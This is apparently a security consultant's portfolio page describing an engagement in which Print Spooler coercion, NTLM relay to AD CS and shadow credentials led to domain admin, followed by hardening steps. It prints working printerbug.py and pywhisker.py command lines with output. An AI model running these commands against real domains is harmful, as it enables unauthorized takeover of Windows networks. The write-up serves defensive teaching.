From Zero to Domain Admin

This engagement demonstrated how minor, low-severity misconfigurations can be chained together to compromise an entire enterprise environment. By exploiting legacy protocols, we bypass traditional perimeter defenses.

Phase 1: Coercion & Relay

We initiated the attack path by forcing a Domain Controller to authenticate to an attacker-controlled listener using the legacy Print Spooler service, relaying that authentication directly to AD CS.

printerbug.py local.domain/attacker:pass@dc01.local 10.10.10.5 [*] Coercing DC01 to authenticate to 10.10.10.5... [+] Connection received on port 445.

Phase 2: Shadow Credentials

With the relayed session, we injected a new public key into the target computer account's attributes, allowing us to request a Certificate and forge a Kerberos Ticket-Granting Ticket.

pywhisker.py -d local.domain -u 'dc01$' --action "add" --key "new_key" [*] Injecting shadow credentials... [+] msDS-KeyCredentialLink updated successfully.

Enforcing Zero-Trust

Securing the domain required breaking the exploit chain at multiple points. We implemented a zero-trust architecture that restricts legacy traffic and enforces strict cryptographic verification.

Disable NTLM

AD CS Hardening

Spooler Cleanup

We enforced SMB signing globally and completely disabled legacy NTLM authentication across the domain, forcing all authentication traffic to use Kerberos.

We disabled HTTP Enrollment endpoints on all active Certificate Authorities and enforced Extended Protection for Authentication to prevent credential relaying.

We disabled the Print Spooler service on all Domain Controllers and tier-0 assets, permanently eliminating the primary coercion vectors.

Peter Czajkowski

Offensive security operator. Zero-trust practitioner.

SYSTEM_CONTACT

peter@czajkowski.sec

PGP: 0x8F3C9A2B

Available for select consulting engagements

(C) 2026 Peter Czajkowski-Offensive security operator. Zero-trust practitioner.

Index-Profile-Projects-Contact